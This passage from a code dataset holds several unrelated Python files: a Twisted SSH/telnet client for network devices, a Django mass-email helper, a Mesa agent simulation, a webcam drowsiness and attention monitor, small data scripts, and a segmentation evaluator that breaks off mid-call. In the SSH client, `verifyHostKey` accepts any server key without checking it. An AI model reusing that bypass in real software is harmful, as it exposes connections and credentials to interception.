method)\n d.addCallback(self._cbUserauthFailure, iterator)\n return d\n\nclass _TriggerCommandTransport(_CommandTransport):\n def connectionSecure(self):\n \"\"\"\n When the connection is secure, start the authentication process.\n \"\"\"\n self._state = b'AUTHENTICATING'\n\n command = _ConnectionReady(self.connectionReady)\n\n self._userauth = _TriggerUserAuth(self.creator.username, command)\n self._userauth.password = self.creator.password\n if self.creator.keys:\n self._userauth.keys = list(self.creator.keys)\n\n if self.creator.agentEndpoint is not None:\n d = self._userauth.connectToAgent(self.creator.agentEndpoint)\n else:\n d = defer.succeed(None)\n\n def maybeGotAgent(ignored):\n self.requestService(self._userauth)\n d.addBoth(maybeGotAgent)\n\n\nclass _TriggerSessionTransport(_TriggerCommandTransport):\n def verifyHostKey(self, hostKey, fingerprint):\n hostname = self.creator.hostname\n ip = self.transport.getPeer().host\n\n self._state = b'SECURING'\n return defer.succeed(1)\n\n\nclass _NewTriggerConnectionHelperBase(_NewConnectionHelper):\n \"\"\"\n Return object used for establishing an async session rather than executing\n a single command.\n \"\"\"\n def __init__(self, reactor, device, port, username, keys, password,\n agentEndpoint, knownHosts, ui):\n self.reactor = reactor\n self.device = device\n self.hostname = device.nodeName\n self.port = port\n self.username = username\n self.keys = keys\n self.password = password\n self.agentEndpoint = agentEndpoint\n if knownHosts is None:\n knownHosts = self._knownHosts()\n self.knownHosts = knownHosts\n self.ui = ui\n\n def secureConnection(self):\n protocol = _TriggerSessionTransport(self)\n ready = protocol.connectionReady\n\n sshClient = TCP4ClientEndpoint(self.reactor, self.hostname, self.port)\n\n d = connectProtocol(sshClient, protocol)\n d.addCallback(lambda ignored: ready)\n return d\n\n\nclass TriggerEndpointClientFactory(protocol.Factory):\n \"\"\"\n Factory for all clients. Subclass me.\n \"\"\"\n def __init__(self, creds=None, init_commands=None):\n self.creds = tacacsrc.validate_credentials(creds)\n self.results = []\n self.err = None\n\n # Setup and run the initial commands\n if init_commands is None:\n init_commands = [] # We need this to be a list\n self.init_commands = init_commands\n log.msg('INITIAL COMMANDS: %r' % self.init_commands, debug=True)\n self.initialized = False\n\n def clientConnectionFailed(self, connector, reason):\n \"\"\"Do this when the connection fails.\"\"\"\n log.msg('Client connection failed. Reason: %s' % reason)\n self.d.errback(reason)\n\n def clientConnectionLost(self, connector, reason):\n \"\"\"Do this when the connection is lost.\"\"\"\n log.msg('Client connection lost. Reason: %s' % reason)\n if self.err:\n log.msg('Got err: %r' % self.err)\n # log.err(self.err)\n self.d.errback(self.err)\n else:\n log.msg('Got results: %r' % self.results)\n self.d.callback(self.results)\n\n def stopFactory(self):\n # IF we're out of channels, shut it down!\n log.msg('All done!')\n\n def _init_commands(self, protocol):\n \"\"\"\n Execute any initial commands specified.\n\n :param protocol: A Protocol instance (e.g. action) to which to write\n the commands.\n \"\"\"\n if not self.initialized:\n log.msg('Not initialized, sending init commands', debug=True)\n for next_init in self.init_commands:\n log.msg('Sending: %r' % next_init, debug=True)\n protocol.write(next_init + '\\r\\n')\n else:\n self.initialized = True\n\n def connection_success(self, conn, transport):\n log.msg('Connection success.')\n self.conn = conn\n self.transport = transport\n log.msg('Connection information: %s' % self.transport)\n\nclass TriggerSSHShellClientEndpointBase(SSHCommandClientEndpoint):\n \"\"\"\n Base class for SSH endpoints.\n\n Subclass me when you want to create a new ssh client.\n \"\"\"\n @classmethod\n def newConnection(cls, reactor, username, device, keys=None, password=None,\n port=22, agentEndpoint=None, knownHosts=None, ui=None):\n\n helper = _NewTriggerConnectionHelperBase(\n reactor, device, port, username, keys, password, agentEndpoint,\n knownHosts, ui\n )\n return cls(helper)\n\n @classmethod\n def existingConnection(cls, connection):\n \"\"\"Overload stock existinConnection to not require ``commands``.\"\"\"\n helper = _ExistingConnectionHelper(connection)\n return cls(helper)\n\n def __init__(self, creator):\n self._creator = creator\n\n def _executeCommand(self, connection, protocolFactory, command, incremental,\n with_errors, prompt_pattern, timeout, command_interval):\n \"\"\"Establish the session on a given endpoint.\n\n For IOS like devices this is normally just a null string.\n \"\"\"\n commandConnected = defer.Deferred()\n def disconnectOnFailure(passthrough):\n # Close the connection immediately in case of cancellation, since\n # that implies user wants it gone immediately (e.g. a timeout):\n immediate = passthrough.check(CancelledError)\n self._creator.cleanupConnection(connection, immediate)\n return passthrough\n commandConnected.addErrback(disconnectOnFailure)\n\n channel = _TriggerShellChannel(\n self._creator, command, protocolFactory, commandConnected, incremental,\n with_errors, prompt_pattern, timeout, command_interval)\n connection.openChannel(channel)\n self.connected = True\n return commandConnected\n\n def connect(self, factory, command='', incremental=None,\n with_errors=None, prompt_pattern=None, timeout=0,\n command_interval=1):\n \"\"\"Method to initiate SSH connection to device.\n\n :param factory: Trigger factory responsible for setting up connection\n :type factory: `~trigger.twister2.TriggerEndpointClientFactory`\n \"\"\"\n d = self._creator.secureConnection()\n d.addCallback(self._executeCommand, factory, command, incremental,\n with_errors, prompt_pattern, timeout, command_interval)\n return d\n\n\nclass IoslikeSendExpect(protocol.Protocol, TimeoutMixin):\n \"\"\"\n Action for use with TriggerTelnet as a state machine.\n\n Take a list of commands, and send them to the device until we run out or\n one errors. Wait for a prompt after each.\n \"\"\"\n def __init__(self):\n self.device = None\n self.commands = []\n self.commanditer = iter(self.commands)\n self.connected = False\n self.disconnect = False\n self.initialized = False\n self.startup_commands = []\n # FIXME(tom) This sux and should be set by trigger settings\n self.timeout = 10\n self.on_error = defer.Deferred()\n self.todo = deque()\n self.done = None\n self.doneLock = defer.DeferredLock()\n\n def connectionMade(self):\n \"\"\"Do this when we connect.\"\"\"\n self.connected = True\n self.finished = defer.Deferred()\n self.results = self.factory.results = []\n self.data = ''\n log.msg('[%s] connectionMade, data: %r' % (self.device, self.data))\n # self.factory._init_commands(self)\n\n def connectionLost(self, reason):\n self.finished.callback(None)\n\n\n # Don't call _send_next, since we expect to see a prompt, which\n # will kick off initialization.\n\n def _schedule_commands(self, results, commands):\n \"\"\"Schedule commands onto device loop.\n\n This is the actual routine to schedule a set of commands onto a device.\n\n :param results: Typical twisted results deferred\n :type results: twisted.internet.defer\n :param commands: List containing commands to schedule onto device loop.\n :type commands: list\n \"\"\"\n d = defer.Deferred()\n self.todo.append(d)\n \n # Schedule next command to run after the previous\n # has finished.\n if self.done and self.done.called is False:\n self.done.addCallback(\n self._schedule_commands,\n commands\n )\n self.done = d\n return d\n\n # First iteration, setup the previous results deferred.\n if not results and self.done is None:\n self.done = defer.Deferred() \n self.done.callback(None)\n\n # Either initial state or we are ready to execute more commands.\n if results or self.done is None or self.done.called:\n log.msg(\"SCHEDULING THE FOLLOWING {0} :: {1} WAS PREVIOUS RESULTS\".format( commands, self.done))\n self.commands = commands\n self.commanditer = iter(commands)\n self._send_next()\n self.done = d\n\n # Each call must return a deferred.\n return d\n\n def add_commands(self, commands, on_error):\n \"\"\"Add commands to abstract list of outstanding commands to execute\n\n The public method for `~trigger.netdevices.NetDevice` to use for appending more commands\n onto the device loop.\n\n :param commands: A list of commands to schedule onto device\"\n :type commands: list\n :param on_error: Error handler\n :type on_error: func\n \"\"\"\n # Exception handler to be used in case device throws invalid command warning.\n self.on_error.addCallback(on_error)\n d = self.doneLock.run(self._schedule_commands, None, commands)\n return d\n\n def dataReceived(self, bytes):\n \"\"\"Do this when we get data.\"\"\"\n log.msg('[%s] BYTES: %r' % (self.device, bytes))\n self.data += bytes # See if the prompt matches, and if it doesn't, see if it is waiting\n # for more input (like a [y/n]) prompt), and continue, otherwise return\n # None\n m = self.prompt.search(self.data)\n if not m:\n # If the prompt confirms set the index to the matched bytes,\n if is_awaiting_confirmation(self.data):\n log.msg('[%s] Got confirmation prompt: %r' % (self.device,\n self.data))\n prompt_idx = self.data.find(bytes)\n else:\n return None\n else:\n # Or just use the matched regex object...\n prompt_idx = m.start()\n\n result = self.data[:prompt_idx]\n # Trim off the echoed-back command. This should *not* be necessary\n # since the telnet session is in WONT ECHO. This is confirmed with\n # a packet trace, and running self.transport.dont(ECHO) from\n # connectionMade() returns an AlreadyDisabled error. What's up?\n log.msg('[%s] result BEFORE: %r' % (self.device, result))\n result = result[result.find('\\n')+1:]\n log.msg('[%s] result AFTER: %r' % (self.device, result))\n\n if self.initialized:\n self.results.append(result)\n\n if has_ioslike_error(result) and not self.with_errors:\n log.msg('[%s] Command failed: %r' % (self.device, result))\n self.factory.err = exceptions.IoslikeCommandFailure(result)\n else:\n if self.command_interval:\n log.msg('[%s] Waiting %s seconds before sending next command' %\n (self.device, self.command_interval))\n\n reactor.callLater(self.command_interval, self._send_next)\n\n def _send_next(self):\n \"\"\"Send the next command in the stack.\"\"\"\n self.data = ''\n self.resetTimeout()\n\n if not self.initialized:\n log.msg('[%s] Not initialized, sending startup commands' %\n self.device)\n if self.startup_commands:\n next_init = self.startup_commands.pop(0)\n log.msg('[%s] Sending initialize command: %r' % (self.device,\n next_init))\n self.transport.write(next_init.strip() + self.device.delimiter)\n return None\n else:\n log.msg('[%s] Successfully initialized for command execution' %\n self.device)\n self.initialized = True\n\n if self.incremental:\n self.incremental(self.results)\n\n try:\n next_command = self.commanditer.next()\n except StopIteration:\n log.msg('[%s] No more commands to send, moving on...' %\n self.device)\n\n if self.todo:\n payload = list(reversed(self.results))[:len(self.commands)]\n payload.reverse()\n d = self.todo.pop()\n d.callback(payload)\n return d\n else:\n return\n\n if next_command is None:\n self.results.append(None)\n self._send_next()\n else:\n log.msg('[%s] Sending command %r' % (self.device, next_command))\n self.transport.write(next_command + '\\n')\n\n def timeoutConnection(self):\n \"\"\"Do this when we timeout.\"\"\"\n log.msg('[%s] Timed out while sending commands' % self.device)\n self.factory.err = exceptions.CommandTimeout('Timed out while '\n 'sending commands')\n self.transport.loseConnection()\n","sub_path":"python/trigger/package-latest/trigger/twister2.py","file_name":"twister2.py","file_ext":"py","file_size_in_byte":23923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"73881144","text":"from django.conf import settings\nfrom django.core.mail import send_mass_mail\nfrom django.template.loader import render_to_string\n\nfrom libs.string_utils import strip_spaces\n\n\ndef render_mail_template(subject_template, body_template, context):\n \"\"\"\n Renders both the subject and body templates in the given context.\n Returns a tuple (subject, body) of the result.\n \"\"\"\n try:\n subject = strip_spaces(render_to_string(subject_template, context))\n body = render_to_string(body_template, context)\n finally:\n pass\n\n return subject, body\n\n\ndef send_mass_template_mail(subject_template, body_template, recipients, context=None):\n \"\"\"\n Renders an email subject and body using the given templates and context,\n then sends it to the given recipients list.\n\n The emails are send one-by-one.\n \"\"\"\n if context:\n subject, body = render_mail_template(subject_template, body_template, context)\n else:\n subject, body = subject_template, body_template\n\n message_tuples = [(subject, body, settings.DEFAULT_FROM_EMAIL, [r]) for r in recipients]\n\n send_mass_mail(message_tuples)\n\n\ndef send_mass_user_template_mail(subject_template, body_template, users, context):\n \"\"\"\n Similar to `send_mass_template_mail` this function renders the given templates\n into email subjects and bodies.\n\n The emails are send one-by-one.\n \"\"\"\n message_tuples = []\n for user in users:\n context['user'] = user\n subject, body = render_mail_template(subject_template, body_template, context)\n\n message_tuples.append((subject, body, settings.DEFAULT_FROM_EMAIL, [user.email]))\n\n if message_tuples:\n send_mass_mail(message_tuples)\n","sub_path":"polyaxon/action_manager/utils/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"420687808","text":"from mesa import Agent, Model, space\nimport random\nimport movement_control, cow_methods\nimport numpy as np\n\nclass CowAgent(Agent):\n \"\"\" Cow Agent with swarming behavior.\"\"\"\n def __init__(self, unique_id, model):\n super().__init__(unique_id, model)\n print(\"creating cow agent\")\n \n #stop moving once in goal\n self.herded = False\n \n #how far the cow can see - used in cell weight calculation\n self.cow_visibility = 3\n \n \n # weights based on cows from Multi Agent Programming Contest\n self.COWWEIGHT = 10.0;\n self.EMPTYWEIGHT = 3.0;\n self.CORRALWEIGHT = 3.0;\n self.AGENTWEIGHT = -200.0;\n self.OBSTACLEWEIGHT = -4.0;\n\n def step(self):\n if(not(self.herded)):\n self.move()\n self.herded = cow_methods.cow_herded(self)\n if(self.herded):\n # take a step back so entrance isn't blocked\n print(\"COW HERDED COW HERDED COW HERDED COW HERDED COW HERDED \")\n cow_methods.step_back(self)\n #else:\n #print(\"cow agent herded, not moving\")\n\n def move(self):\n possible_steps = movement_control.find_empty_location(self.pos, self.model)\n \n #select new position based on cow behavior algorithm from Multi Agent Programming Contest\n new_position = self.cow_behavior(possible_steps)\n\n if (new_position is not None):\n self.model.grid.move_agent(self, new_position)\n \n def cow_behavior(self, possible_steps):\n new_position = None\n #calculate the weights of each cell and list cells with max weight\n best_locations = self.calculate_weights(possible_steps)\n \n #randomly pick from maximum weight cells\n if best_locations:\n new_position = random.choice(best_locations)\n else:\n new_position = self.pos # don't move if there is nowhere to go\n \n return new_position\n \n def calculate_weights(self, possible_steps):\n best_locations = []\n best_score = -np.inf\n for cell in possible_steps:\n cell_weight = self.calculate_single_weight(cell)\n if cell_weight > best_score:\n best_locations = [cell]\n best_score = cell_weight\n elif cell_weight == best_score:\n best_locations.append(cell)\n return best_locations\n\n def calculate_single_weight(self, cell):\n \"\"\" Calculate the weight of cell based on visibility radius\"\"\"\n cell_weight = 0.0\n neighborhood_cells = self.model.grid.get_neighborhood(cell, moore=True, include_center=False, radius=self.cow_visibility)\n for neighbor in neighborhood_cells:\n distance = movement_control.get_distance(self.model.grid, cell, neighbor)\n weight = self.get_weight(neighbor)\n cell_weight += (weight/distance)\n return cell_weight\n \n \n def get_weight(self, cell):\n weight = 0.0\n #print(\"getting weight of \", cell)\n \"\"\" get the weight value based on contents of a cell \"\"\"\n if self.model.grid.is_cell_empty(cell):\n weight = self.EMPTYWEIGHT\n else:\n agent = self.model.grid.get_cell_list_contents(cell)[0]\n weight = cow_methods.determine_weight(agent)\n #print(\"the cell contains\", type(agent))\n #if type(agent) is WallAgent:\n # weight = self.OBSTACLEWEIGHT\n #if type(agent) is RandomAgent:\n # weight = self.AGENTWEIGHT\n #if type(agent) is CowAgent:\n # weight = self.COWWEIGHT\n #if type(agent) is PlanAgent:\n # weight = self.AGENTWEIGHT\n #print(\"weight is \", weight)\n return weight\n \n\n\n #def calculate_weights(self, possible_cells):\n # \"\"\"Return weights as stated in Multi Agent Programming Contest\"\"\"\n # print(\"cells are \", possible_cells)\n # \n # cells_in_view = \n # \n # for cell in possible_cells:\n # weight = 0\n # #if empty/corral, weight = 3\n # if self.model.grid.is_cell_empty(cell):\n # weight = 3\n # print(\"empty cell weight is 3\")\n # else:\n # agent = self.model.grid.get_cell_list_contents(cell)\n # print(\"the cell contains\", type(agent))\n #if cow, weight = 10\n #if agent, weight = -200\n #if obstacle, weight = -4\n","sub_path":"cow_agent.py","file_name":"cow_agent.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71493","text":"import pandas as pd\nimport matplotlib as mpl\nimport seaborn as sns\nimport csv\n\nfrom sklearn import preprocessing\nfrom matplotlib import pyplot as plt\n\ndef Normalization():\n data_file = \"..\\PRSA2017_Data_20130301-20170228\\PRSA_Data_20130301-20170228\\simpleDataSet.csv\"\n pd_data = pd.read_csv(data_file)\n sam = []\n a = [\"PM10\", \"SO2\",\"NO2\",\"CO\",\"PRES\",\"DEWP\"]\n for i in a:\n y = pd_data.loc[:, i]\n ys = list(preprocessing.scale(y))\n sam.append(ys)\n\n print(len(sam))\n with open('eth2.csv', 'w') as file:\n writer = csv.writer(file)\n for i in range(len(sam[0])):\n writer.writerow([sam[0][i],sam[1][i],sam[2][i],sam[3][i],sam[4][i],sam[5][i]])\n","sub_path":"5 环境污染的预测/pm2.5的线性回归预测模型-今天睡醒了吗/Normalization.py","file_name":"Normalization.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"29464080","text":"from scipy.spatial import distance as dist\r\nfrom imutils.video import VideoStream\r\nfrom imutils import face_utils\r\nfrom threading import Thread\r\nimport argparse\r\nimport pandas as pd\r\nimport numpy as np\r\nimport playsound\r\nimport imutils\r\nimport time\r\nimport dlib\r\nimport cv2\r\nimport pandas as pd\r\n\r\n\r\n\r\nstart_time=time.time()\r\n\r\n\r\n\r\n\r\ndef eye_aspect_ratio(eye):\r\n\t# compute the euclidean distances between the two sets of\r\n\t# vertical eye landmarks (x, y)-coordinates\r\n\tA = dist.euclidean(eye[1], eye[5])\r\n\tB = dist.euclidean(eye[2], eye[4])\r\n\r\n\t# compute the euclidean distance between the horizontal\r\n\t# eye landmark (x, y)-coordinates\r\n\tC = dist.euclidean(eye[0], eye[3])\r\n\r\n\t# compute the eye aspect ratio\r\n\tear = (A + B) / (2.0 * C)\r\n\r\n\t# return the eye aspect ratio\r\n\treturn ear\r\n\r\ndef smile_ratio(mouth):\r\n left = mouth[0]\r\n top = mouth[3]\r\n right = mouth[6]\r\n bottom = mouth[9]\r\n return (dist.euclidean(left,top)+dist.euclidean(right,top))/(dist.euclidean(left,bottom)+dist.euclidean(right,bottom))\r\n\r\ndef isSmiling(SmileRatio):\r\n return (SmileRatio<0.85)\r\n \r\ndef yawn_ratio(mouth):\r\n\tleft = mouth[0]\r\n\ttop = mouth[3]\r\n\tright = mouth[6]\r\n\tbottom = mouth[9]\r\n\treturn dist.euclidean(top,bottom)/dist.euclidean(left,right)\r\n\r\ndef isYawning(YawnRatio):\r\n\treturn (YawnRatio>0.6)\r\n\t\r\ndef look_away(points):\r\n\tleft = points[0]\r\n\tright = points[1]\r\n\tcenter = points[2]\r\n\treturn dist.euclidean(left,center)/dist.euclidean(center,right)\r\n\t\r\n\t\r\n\t\r\n\r\ndata_dict={}\r\ndata_dict['time_away']=0\r\ndata_dict['yawn']=0\r\ndata_dict['Blinks'] = 0\r\ndata_dict['Looked_Away']=0\r\ndata_dict['time_smiling'] = 0\r\n\r\ndist_arr=[]\r\ndrowsy_arr=[]\r\n\r\nEYE_AR_THRESH = 0.3\r\nEYE_AR_CONSEC_FRAMES_blink = 3\r\nEYE_AR_CONSEC_FRAMES_drowsy = 48\r\nYAWN_THRESH = 30\r\nSMILE_CONSEC_FRAMES = 30\r\n\r\n# initialize the frame counters and the total number of blinks\r\nBLINK_COUNTER = 0\r\nDROWSY_COUNTER=0\r\nYAWNCOUNTER = 0\r\nSMILECOUNTER = 0\r\n\r\nALARM_ON=False\r\n\r\n(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\r\n(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\r\n(mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\r\n\r\ndetector = dlib.get_frontal_face_detector()\r\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\r\n\r\n\r\nvs = VideoStream(src=0).start()\r\n# vs = VideoStream(usePiCamera=True).start()\r\nfileStream = False\r\ntime.sleep(1.0)\r\nlooking_away_timer=0\r\nsmiling_timer = 0\r\ntemp_count=0\r\nprev_time=float('Inf')\r\nsmile_start_time = float('Inf')\r\n\r\nwhile True:\r\n\tif fileStream and not vs.more():\r\n\t\tbreak\r\n\r\n\tframe = vs.read()\r\n\tframe = imutils.resize(frame, width=450)\r\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\trects = detector(gray, 0)\r\n\r\n\r\n\tlooking_away_timer+=1\r\n\t\r\n\tif(time.time()-prev_time>3 and temp_count==0):\r\n\t\t\tprint('looking away')\r\n\t\t\tcur_time=time.time()\r\n\t\t\tdata_dict['Looked_Away']+=1\r\n\t\t\ttemp_count=1\r\n\t\t\r\n\t\r\n\tfor rect in rects:\r\n\t\tprev_time=time.time()\r\n\t\tif(temp_count==1):\r\n\t\t\tdata_dict['time_away']+=(prev_time-cur_time)\r\n\t\t\ttemp_arr=[cur_time,prev_time]\r\n\t\t\tdist_arr.append(temp_arr)\r\n\t\t\ttemp_count=0\r\n\t\t\tprint(temp_arr)\r\n\t\t\r\n\t\tlooking_away_timer=0\r\n\t\t\r\n\r\n\t\t\r\n\t\tshape = predictor(gray, rect)\r\n\t\tshape = face_utils.shape_to_np(shape)\r\n\r\n\t\tleftEye = shape[lStart:lEnd]\r\n\t\trightEye = shape[rStart:rEnd]\r\n\t\tleftEAR = eye_aspect_ratio(leftEye)\r\n\t\trightEAR = eye_aspect_ratio(rightEye)\r\n\t\tmouth = shape[mStart:mEnd]\r\n\t\tSmileRatio = smile_ratio(mouth)\r\n\t\tYawnRatio = yawn_ratio(mouth)\r\n\t\tpoints = [shape[0],shape[16],shape[27],shape[33],shape[8]]\r\n\t\tif (isSmiling(SmileRatio)):\r\n\t\t\tsmile ='smiling'\r\n\t\telse:\r\n\t\t\tsmile ='not smiling'\r\n\t\t\t\r\n\t\tif (isYawning(YawnRatio)):\r\n\t\t\tyawn ='yawning'\r\n\t\telse:\r\n\t\t\tyawn ='not yawning'\r\n\t\t\t\r\n\t\tif(isSmiling(SmileRatio)):\r\n\t\t\tSMILECOUNTER+=1\r\n\t\t\tif(smile_start_time==float('inf')):\r\n\t\t\t\tsmile_start_time = time.time()\r\n\t\telse:\r\n\t\t\tif(SMILECOUNTER>SMILE_CONSEC_FRAMES):\r\n\t\t\t\tdata_dict['time_smiling']+= time.time()-smile_start_time\r\n\t\t\t\ttemp_arr=[smile_start_time,time.time()]\r\n\t\t\t\tdist_arr.append(temp_arr)\r\n\t\t\t\tsmile_start_time = float('Inf')\r\n\t\t\tSMILECOUNTER=0\r\n\t\t\t\r\n\t\tif(isYawning(YawnRatio)):\r\n\t\t\tYAWNCOUNTER+=1\r\n\t\telse:\r\n\t\t\tif(YAWNCOUNTER>YAWN_THRESH):\r\n\t\t\t\tdata_dict['yawn']+=1\r\n\t\t\tYAWNCOUNTER=0\r\n\t\t\r\n\t\tear = (leftEAR + rightEAR) / 2.0\r\n\r\n\t\tleftEyeHull = cv2.convexHull(leftEye)\r\n\t\trightEyeHull = cv2.convexHull(rightEye)\r\n\t\t\r\n\t\tcv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\r\n\r\n\t\tif (ear < EYE_AR_THRESH):\r\n\t\t\tBLINK_COUNTER += 1\r\n\t\t\tDROWSY_COUNTER += 1\r\n\t\t\t\r\n\t\t\tif(DROWSY_COUNTER>=EYE_AR_CONSEC_FRAMES_drowsy):\r\n\t\t\t\tdrowsy_arr.append(DROWSY_COUNTER)\r\n\t\t\t\tALARM_ON=True\r\n\t\t\t\tcv2.putText(frame, \"Drowsiness: {:.2f}\".format(ear), (300, 30),cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\t\telse:\r\n\t\t\tdrowsy_arr.append(0)\r\n\t\t\t\r\n\t\t\t# if the eyes were closed for a sufficient number of\r\n\t\t\t# then increment the total number of blinks\r\n\t\t\tif BLINK_COUNTER >= EYE_AR_CONSEC_FRAMES_blink:\r\n\t\t\t\tdata_dict['Blinks'] += 1\r\n\t\t\t\r\n\t\t\tBLINK_COUNTER = 0\r\n\t\t\tDROWSY_COUNTER = 0\r\n\t\t\t\r\n \r\n \r\n\r\n\r\n\t\t# draw the total number of blinks on the frame along with\r\n\t\t# the computed eye aspect ratio for the frame\r\n\t\tcv2.putText(frame, smile, (10, 30),\r\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\r\n\t\tcv2.putText(frame, yawn, (10, 50),\r\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\r\n\t\tfor (x,y) in points:\r\n\t\t\tcv2.circle(frame, (x, y), 1, (0, 0, 255), -1)\r\n\t\tcv2.putText(frame, str(look_away(points)), (300, 30),\r\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\r\n\t# show the frame\r\n\tcv2.imshow(\"Frame\", frame)\r\n\tkey = cv2.waitKey(1) & 0xFF\r\n\r\n\t# if the `q` key was pressed, break from the loop\r\n\tif key == ord(\"q\"):\r\n\t\tdata=pd.read_csv('data.csv')\r\n\t\t\r\n\t\tdata_dict['Total_working_time']=time.time()-start_time\r\n\t\tdata_dict['dist_times']=dist_arr\r\n\t\tdata_dict['drowsy_times']=drowsy_arr\r\n\t\t\r\n\t\tdata=data.append(data_dict,ignore_index=True)\r\n\t\tdata.to_csv('data.csv',index=False)\r\n\r\n\t\tbreak\r\n\r\n# do a bit of cleanup\r\ncv2.destroyAllWindows()\r\nvs.stop()\r\n\r\n#data=pd.read_csv('C:\\\\Users\\\\nomif\\\\Desktop\\\\Intution\\\\data.csv')\r\n#print(data)\r\n","sub_path":"ProductivityAnalyser/howProductive.py","file_name":"howProductive.py","file_ext":"py","file_size_in_byte":6101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"644933438","text":"Pink = int(input())\nGreen = int(input())\nRed = int(input())\nOrange = int(input())\ntoRaise = int(input())\nto = toRaise + 1\ncount = 0\nmini = 9999999\nfor i in range(to):\n for j in range(to):\n for k in range(to):\n for l in range(to):\n res = i*Pink + j*Green + k*Red + l*Orange\n totTicks = i + j + k + l\n if i == j == k == l == 0:\n continue\n if mini > totTicks:\n mini = totTicks\n if res == toRaise:\n print(\"# of PINK is\", i , \"# of GREEN is\", j ,\"# of RED is\", k ,\"# of ORANGE is \", l)\n count += 1\nprint(\"Total combinations is \", count, \".\", sep=\"\")\nprint(\"Minimum number of tickets to print is \", mini, \".\", sep=\"\")","sub_path":"CCC/2933458.py","file_name":"2933458.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"47034783","text":"import json\nimport boto3\n\ncodebuild = boto3.client('codebuild')\n\ndef lambda_handler(event, context):\n # Start codeBuild when codeCommit trigger lambda func\n response = codebuild.start_build(\n projectName = 'DemoQuestionExamCodeBuild',\n sourceVersion = 'refs/heads/master'\n )\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172857758","text":"import os\nimport sys\n\nimport cv2\nimport torch\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom coral_reef.constants import paths\nfrom coral_reef.ml import predict\nfrom coral_reef.ml.utils import colour_mask_to_class_id_mask, cut_windows\n\nsys.path.extend([paths.DEEPLAB_FOLDER_PATH, os.path.join(paths.DEEPLAB_FOLDER_PATH, \"utils\")])\n\nfrom metrics import Evaluator\n\n\ndef evaluate(image_file_paths, gt_file_paths, model, nn_input_size, num_classes, window_sizes=None, step_sizes=None,\n device=None):\n \"\"\"\n Evaluate model performance\n :param image_file_paths: paths to images that will be predicted\n :param gt_file_paths: paths to ground truth masks\n :param model: model used for prediction\n :param nn_input_size: size that the images will be scaled to before feeding them into the nn\n :param num_classes: number of classes\n :param window_sizes: list of sizes that determine how the image will be cut (for sliding window). Image will be cut\n into squares\n :param step_sizes: list of step sizes for sliding window\n :param device: PyTorch device (cpu or gpu)\n :return: list of prediction masks if res_fcn is None, else Nothing\n \"\"\"\n model.eval()\n evaluator = Evaluator(num_classes)\n\n def ev(prediction, index):\n pred_class_id_mask = np.argmax(prediction, axis=-1)\n gt_colour_mask = cv2.imread(gt_file_paths[index])[:, :, 0]\n gt_class_id_mask = colour_mask_to_class_id_mask(gt_colour_mask)\n\n # Add sample into evaluator\n evaluator.add_batch(gt_class_id_mask, pred_class_id_mask)\n\n with torch.no_grad():\n predict.predict(image_file_paths=image_file_paths,\n model=model,\n nn_input_size=nn_input_size,\n res_fcn=ev,\n window_sizes=window_sizes,\n step_sizes=step_sizes,\n device=device)\n\n with np.errstate(divide='ignore', invalid='ignore'):\n acc = evaluator.Pixel_Accuracy()\n acc_class = evaluator.Pixel_Accuracy_Class()\n mIoU = evaluator.Mean_Intersection_over_Union()\n fWIoU = evaluator.Frequency_Weighted_Intersection_over_Union()\n\n return acc, acc_class, mIoU, fWIoU\n\n\ndef find_best_cutting_sizes(image_file_paths, gt_file_paths, model, nn_input_size, num_classes, device=None):\n \"\"\"\n Determine the best values for cutting the big image into smaller images for prediction\n :param image_file_paths: paths to images that will be predicted\n :param gt_file_paths: paths to ground truth masks\n :param model: model used for prediction\n :param nn_input_size: size that the images will be scaled to before feeding them into the nn\n :param num_classes: number of classes\n :param device: PyTorch device (cpu or gpu)\n :return: dict containing the tested values and the resulting prediction metrics\n \"\"\"\n\n # define the window sizes and step sizes that will be tested\n window_sizes_list = []\n step_sizes_list = []\n\n step_size_fractions = [0.8, 0.5, 0.3]\n for ss_fraction in step_size_fractions:\n window_sizes_list.append([500, 700, 1000, 1500])\n step_sizes_list.append([int(w * ss_fraction) for w in window_sizes_list[-1]])\n\n window_sizes_list.append([500, 700, 1000])\n step_sizes_list.append([int(w * ss_fraction) for w in window_sizes_list[-1]])\n\n window_sizes_list.append([700, 1000, 1500])\n step_sizes_list.append([int(w * ss_fraction) for w in window_sizes_list[-1]])\n\n window_sizes_list.append([700, 1000])\n step_sizes_list.append([int(w * ss_fraction) for w in window_sizes_list[-1]])\n\n results = []\n\n # go through window sizes and step sizes and use them for prediction\n\n for window_sizes, step_sizes in zip(window_sizes_list, step_sizes_list):\n acc, acc_class, mIoU, fWIoU = evaluate(image_file_paths=image_file_paths,\n gt_file_paths=gt_file_paths,\n model=model,\n nn_input_size=nn_input_size,\n 